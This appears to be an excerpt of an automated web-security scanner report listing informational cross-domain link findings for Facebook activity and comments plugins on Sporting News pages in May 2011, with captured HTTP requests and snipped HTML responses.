  • http://dy.snimg.com/story-image/0/26/185199/31162-106-85.jpg
  • http://dy.snimg.com/story-image/1/35/185305/31291-106-85.jpg
  • http://dy.snimg.com/story-image/3/21/185097/30983-106-85.jpg
  • http://dy.snimg.com/story-image/3/38/184726/30464-106-85.jpg
  • http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/jKEcVPZFk-2.gif
  • http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css
  • http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png
  • http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js
  • http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/AZ23fTP8PUp.css
  • http://www.sportingnews.com/mlb/story/2011-04-21/high-school-player-makes-incredible-leap-over-catcher-to-avoid-tag-at-home
  • http://www.sportingnews.com/nba/story/2011-05-03/sporting-news-executive-of-the-year-pat-riley
  • http://www.sportingnews.com/ncaa-football/story/2011-04-27/post-spring-top-25-lsu-oklahoma-top-rankings
  • http://www.sportingnews.com/ncaa-football/story/2011-05-02/billboard-off-michigan-highway-takes-aim-at-jim-tressel
  • http://www.sportingnews.com/nfl/story/2011-05-03/rooney-responds-to-mendenhalls-tweets-about-bin-laden

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.118.101
X-Cnection: close
Date: Thu, 05 May 2011 01:12:27 GMT
Content-Length: 12207

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/AZ23fTP8PUp.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_4b94bfc2aa514d81"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.sportingnews.com/nfl/story/2011-05-03/rooney-responds-to-mendenhalls-tweets-about-bin-laden" title="Rooney responds to Mendenhall&#039;s tweets about bin Laden" target="_top"><img class="img" src="http://dy.snimg.com/story-image/0/26/185199/31162-106-85.jpg" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.sportingnews.com/nfl/story/2011-05-03/rooney-responds-to-mendenhalls-tweets-about-bin-laden" target="_top">Rooney responds to Mendenhall&#039;s tweets about bin Laden</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_2769d2d3935682ad"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.sportingnews.com/nba/story/2011-05-03/sporting-news-executive-of-the-year-pat-riley" title="Sporting News Executive of the Year: Pat Riley" target="_top"><img class="img" src="http://dy.snimg.com/story-image/1/35/185305/31291-106-85.jpg" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.sportingnews.com/nba/story/2011-05-03/sporting-news-executive-of-the-year-pat-riley" target="_top">Sporting News Executive of the Year: Pat Riley</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_7e0f06a02744cb0"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.sportingnews.com/ncaa-football/story/2011-05-02/billboard-off-michigan-highway-takes-aim-at-jim-tressel" title="Billboard off Michigan highway takes aim at Jim Tressel" target="_top"><img class="img" src="http://dy.snimg.com/story-image/3/21/185097/30983-106-85.jpg" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.sportingnews.com/ncaa-football/story/2011-05-02/billboard-off-michigan-highway-takes-aim-at-jim-tressel" target="_top">Billboard off Michigan highway takes aim at Jim Tressel</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_7540fa1ea52c6dbc"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.sportingnews.com/ncaa-football/story/2011-04-27/post-spring-top-25-lsu-oklahoma-top-rankings" title="Post-Spring Top 25: LSU, Oklahoma top rankings" target="_top"><img class="img" src="http://dy.snimg.com/story-image/3/38/184726/30464-106-85.jpg" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.sportingnews.com/ncaa-football/story/2011-04-27/post-spring-top-25-lsu-oklahoma-top-rankings" target="_top">Post-Spring Top 25: LSU, Oklahoma top rankings</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_28a9f95c67aa7786"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.sportingnews.com/mlb/story/2011-04-21/high-school-player-makes-incredible-leap-over-catcher-to-avoid-tag-at-home" title="High school player makes incredible leap over catcher to avoid tag at home" target="_top"><img class="img" src="http://ad.doubleclick.net/ad/spn.mlb/article;pos=bottom;tile=4;sz=728x90;slug=high-school-player-makes-incredible-leap-over-catcher-to-avoid-tag-at-home;zone=article;story_sport=mlb;ord=160470471?" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.sportingnews.com/mlb/story/2011-04-21/high-school-player-makes-incredible-leap-over-catcher-to-avoid-tag-at-home" target="_top">High school player makes incredible leap over catcher to avoid tag at home</a>
...[SNIP]...
</div><img class="fbLoadImg img" src="http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/jKEcVPZFk-2.gif" width="32" height="32" /></div>
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ICON_Image" target="_blank" href="http://developers.facebook.com/plugins/?footer=3" tabindex="-1"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png" width="14" height="14" /></a>
...[SNIP]...

16.46. http://www.facebook.com/plugins/comments.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/comments.php

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.facebook.com/plugins/comments.php?api_key=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3d35cd15c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffeb4109d%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Faol.sportingnews.com%2Fnfl%2Fstory%2F2011-05-04%2Fathletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter&locale=en_US&numposts=10&sdk=joey&width=650
The response contains the following links to other domains:
  • http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?fb_comment_id=fbc_10150174862354920_16357140_10150175027384920
  • http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?fb_comment_id=fbc_10150174862354920_16358036_10150175060969920
  • http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?fb_comment_id=fbc_10150174862354920_16358894_10150175094164920
  • http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?fb_comment_id=fbc_10150174862354920_16359088_10150175101634920
  • http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?fb_comment_id=fbc_10150174862354920_16359628_10150175124154920
  • http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?fb_comment_id=fbc_10150174862354920_16359722_10150175127474920
  • http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?fb_comment_id=fbc_10150174862354920_16360072_10150175141024920
  • http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?fb_comment_id=fbc_10150174862354920_16360361_10150175151464920
  • http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?fb_comment_id=fbc_10150174862354920_16360789_10150175169889920
  • http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?fb_comment_id=fbc_10150174862354920_16361729_10150175203974920
  • http://profile.ak.fbcdn.net/hprofile-ak-snc4/161180_1177249231_4939893_q.jpg
  • http://profile.ak.fbcdn.net/hprofile-ak-snc4/161188_1020937929_5104297_q.jpg
  • http://profile.ak.fbcdn.net/hprofile-ak-snc4/161429_100000704624017_7176502_q.jpg
  • http://profile.ak.fbcdn.net/hprofile-ak-snc4/186000_831972862_4372260_q.jpg
  • http://profile.ak.fbcdn.net/hprofile-ak-snc4/186692_1830128021_6341647_q.jpg
  • http://profile.ak.fbcdn.net/hprofile-ak-snc4/187272_100002122115800_7062068_q.jpg
  • http://profile.ak.fbcdn.net/hprofile-ak-snc4/187593_100001547816690_2540739_q.jpg
  • http://profile.ak.fbcdn.net/hprofile-ak-snc4/195286_100001088242101_5524507_q.jpg
  • http://profile.ak.fbcdn.net/hprofile-ak-snc4/195581_1555862837_841847_q.jpg

Request

GET /plugins/comments.php?api_key=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3d35cd15c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffeb4109d%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Faol.sportingnews.com%2Fnfl%2Fstory%2F2011-05-04%2Fathletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter&locale=en_US&numposts=10&sdk=joey&width=650 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?icid=maing-grid7%7Cmain5%7Cdl4%7Csec1_lnk3%7C60545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.189.49
X-Cnection: close
Date: Thu, 05 May 2011 11:40:13 GMT
Content-Length: 171395

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/AZ23fTP8PUp.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/D97gxsfJDCQ.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y5/r/Z6PtFE_aVAz.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y1/r/kKOeJEnwuz7.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yQ/r/9qdm_pQmTM3.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/4wOZW9c83Yr.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yO/r/O4MC2pFJMzJ.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...
<a class="viewerProfileHref" onclick="return false;" target="_blank" href="#"><img class="uiProfilePhoto viewerProfilePic uiProfilePhotoLarge img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /></a>
...[SNIP]...
</div><img class="throbber img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" width="16" height="11" /><div class="postToProfile hidden_elem">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="http://www.facebook.com/wmoppert" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/41774_1675365945_9562_q.jpg" /></a>
...[SNIP]...
</a> .. <a class="uiLinkSubtle" href="http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?fb_comment_id=fbc_10150174862354920_16359088_10150175101634920" target="_blank" onmousedown="UntrustedLink.bootstrap($(this), &quot;c4dbd&quot;, event, bagof(null));" rel="nofollow"><abbr title="Wednesday, May 4, 2011 at 4:25pm" data-date="Wed, 04 May 2011 16:25:34 -0700" class="timestamp">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="http://www.facebook.com/matthew.oliveira2" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/195286_100001088242101_5524507_q.jpg" /></a>
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="http://www.facebook.com/profile.php?id=1708077046" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211232_1708077046_5678275_q.jpg" /></a>
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="http://www.facebook.com/osbornecruiser" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/186000_831972862_4372260_q.jpg" /></a>
...[SNIP]...
<span class="uiMorePagerLoader pam uiBoxWhite topborder fbFeedbackPagerLink"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" width="16" height="11" /></span>
...[SNIP]...
<input type="hidden" autocomplete="off" name="command" value="reply" /><img class="uiProfilePhoto viewerProfilePic uiProfilePhotoLarge img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="replywrapper">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="http://www.facebook.com/profile.php?id=100000910578526" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /></a>
...[SNIP]...
</a> .. <a class="uiLinkSubtle" href="http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?fb_comment_id=fbc_10150174862354920_16361729_10150175203974920" target="_blank" onmousedown="UntrustedLink.bootstrap($(this), &quot;c4dbd&quot;, event, bagof(null));" rel="nofollow"><abbr title="Wednesday, May 4, 2011 at 7:12pm" data-date="Wed, 04 May 2011 19:12:09 -0700" class="timestamp">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="http://www.facebook.com/profile.php?id=559819104" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/195640_559819104_1920008_q.jpg" /></a>
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="http://www.facebook.com/profile.php?id=1177249231" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/161180_1177249231_4939893_q.jpg" /></a>
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="#" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/161429_100000704624017_7176502_q.jpg" /></a>
...[SNIP]...
<span class="uiMorePagerLoader pam uiBoxWhite topborder fbFeedbackPagerLink"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" width="16" height="11" /></span>
...[SNIP]...
<input type="hidden" autocomplete="off" name="command" value="reply" /><img class="uiProfilePhoto viewerProfilePic uiProfilePhotoLarge img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="replywrapper">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="#" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/195581_1555862837_841847_q.jpg" /></a>
...[SNIP]...
</a> .. <a class="uiLinkSubtle" href="http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?fb_comment_id=fbc_10150174862354920_16360072_10150175141024920" target="_blank" onmousedown="UntrustedLink.bootstrap($(this), &quot;c4dbd&quot;, event, bagof(null));" rel="nofollow"><abbr title="Wednesday, May 4, 2011 at 5:38pm" data-date="Wed, 04 May 2011 17:38:56 -0700" class="timestamp">
...[SNIP]...
<input type="hidden" autocomplete="off" name="command" value="reply" /><img class="uiProfilePhoto viewerProfilePic uiProfilePhotoLarge img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="replywrapper">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="http://www.facebook.com/profile.php?id=1020937929" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/161188_1020937929_5104297_q.jpg" /></a>
...[SNIP]...
</a> .. <a class="uiLinkSubtle" href="http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?fb_comment_id=fbc_10150174862354920_16359722_10150175127474920" target="_blank" onmousedown="UntrustedLink.bootstrap($(this), &quot;c4dbd&quot;, event, bagof(null));" rel="nofollow"><abbr title="Wednesday, May 4, 2011 at 5:14pm" data-date="Wed, 04 May 2011 17:14:50 -0700" class="timestamp">
...[SNIP]...
<input type="hidden" autocomplete="off" name="command" value="reply" /><img class="uiProfilePhoto viewerProfilePic uiProfilePhotoLarge img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="replywrapper">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="http://www.facebook.com/profile.php?id=100001547816690" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/187593_100001547816690_2540739_q.jpg" /></a>
...[SNIP]...
<span class="fsm fwn fcg"> .. <img class="star img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yI/r/akOVLqNGOB0.png" width="15" height="14" /> Top Commenter .. <a class="uiLinkSubtle" href="http://www.facebook.com/pages/Editor-in-Chief/137829579583400" target="_blank">
...[SNIP]...
</a> .. <a class="uiLinkSubtle" href="http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?fb_comment_id=fbc_10150174862354920_16357140_10150175027384920" target="_blank" onmousedown="UntrustedLink.bootstrap($(this), &quot;c4dbd&quot;, event, bagof(null));" rel="nofollow"><abbr title="Wednesday, May 4, 2011 at 2:23pm" data-date="Wed, 04 May 2011 14:23:54 -0700" class="timestamp">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="http://www.facebook.com/profile.php?id=100002317366719" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /></a>
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="#" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/203384_789689679_4009078_q.jpg" /></a>
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="http://www.facebook.com/profile.php?id=100000763574061" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/41644_100000763574061_9403_q.jpg" /></a>
...[SNIP]...
<span class="uiMorePagerLoader pam uiBoxWhite topborder fbFeedbackPagerLink"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" width="16" height="11" /></span>
...[SNIP]...
<input type="hidden" autocomplete="off" name="command" value="reply" /><img class="uiProfilePhoto viewerProfilePic uiProfilePhotoLarge img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="replywrapper">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="http://www.facebook.com/profile.php?id=1231308703" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/50095_1231308703_4625795_q.jpg" /></a>
...[SNIP]...
</a> .. <a class="uiLinkSubtle" href="http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?fb_comment_id=fbc_10150174862354920_16360361_10150175151464920" target="_blank" onmousedown="UntrustedLink.bootstrap($(this), &quot;c4dbd&quot;, event, bagof(null));" rel="nofollow"><abbr title="Wednesday, May 4, 2011 at 5:57pm" data-date="Wed, 04 May 2011 17:57:33 -0700" class="timestamp">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="http://www.facebook.com/profile.php?id=1702633465" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/41655_1702633465_9909_q.jpg" /></a>
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="http://www.facebook.com/profile.php?id=1702633465" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/41655_1702633465_9909_q.jpg" /></a>
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="http://www.facebook.com/profile.php?id=1329611005" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/49225_1329611005_1636_q.jpg" /></a>
...[SNIP]...
<span class="uiMorePagerLoader pam uiBoxWhite topborder fbFeedbackPagerLink"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" width="16" height="11" /></span>
...[SNIP]...
<input type="hidden" autocomplete="off" name="command" value="reply" /><img class="uiProfilePhoto viewerProfilePic uiProfilePhotoLarge img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="replywrapper">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="http://www.facebook.com/dcashin" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/195666_803749624_3820493_q.jpg" /></a>
...[SNIP]...
</a> .. <a class="uiLinkSubtle" href="http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?fb_comment_id=fbc_10150174862354920_16360789_10150175169889920" target="_blank" onmousedown="UntrustedLink.bootstrap($(this), &quot;c4dbd&quot;, event, bagof(null));" rel="nofollow"><abbr title="Wednesday, May 4, 2011 at 6:24pm" data-date="Wed, 04 May 2011 18:24:57 -0700" class="timestamp">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="#" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/186692_1830128021_6341647_q.jpg" /></a>
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="http://www.facebook.com/profile.php?id=777698905" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/49146_777698905_4333735_q.jpg" /></a>
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="http://www.facebook.com/dcashin" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/195666_803749624_3820493_q.jpg" /></a>
...[SNIP]...
<span class="uiMorePagerLoader pam uiBoxWhite topborder fbFeedbackPagerLink"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" width="16" height="11" /></span>
...[SNIP]...
<input type="hidden" autocomplete="off" name="command" value="reply" /><img class="uiProfilePhoto viewerProfilePic uiProfilePhotoLarge img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="replywrapper">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="http://www.facebook.com/profile.php?id=1440527900" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211995_1440527900_6271125_q.jpg" /></a>
...[SNIP]...
</a> .. <a class="uiLinkSubtle" href="http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?fb_comment_id=fbc_10150174862354920_16359628_10150175124154920" target="_blank" onmousedown="UntrustedLink.bootstrap($(this), &quot;c4dbd&quot;, event, bagof(null));" rel="nofollow"><abbr title="Wednesday, May 4, 2011 at 5:09pm" data-date="Wed, 04 May 2011 17:09:18 -0700" class="timestamp">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="http://www.facebook.com/mutsai.sifana" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/23094_1026664643_4591_q.jpg" /></a>
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="http://www.facebook.com/jeff.klora" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/27410_1501705828_2044_q.jpg" /></a>
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="#" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/27421_100000139735724_4046_q.jpg" /></a>
...[SNIP]...
<span class="uiMorePagerLoader pam uiBoxWhite topborder fbFeedbackPagerLink"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" width="16" height="11" /></span>
...[SNIP]...
<input type="hidden" autocomplete="off" name="command" value="reply" /><img class="uiProfilePhoto viewerProfilePic uiProfilePhotoLarge img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="replywrapper">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="#" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211287_1286867422_6012394_q.jpg" /></a>
...[SNIP]...
</a> .. <a class="uiLinkSubtle" href="http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?fb_comment_id=fbc_10150174862354920_16358036_10150175060969920" target="_blank" onmousedown="UntrustedLink.bootstrap($(this), &quot;c4dbd&quot;, event, bagof(null));" rel="nofollow"><abbr title="Wednesday, May 4, 2011 at 3:14pm" data-date="Wed, 04 May 2011 15:14:49 -0700" class="timestamp">
...[SNIP]...
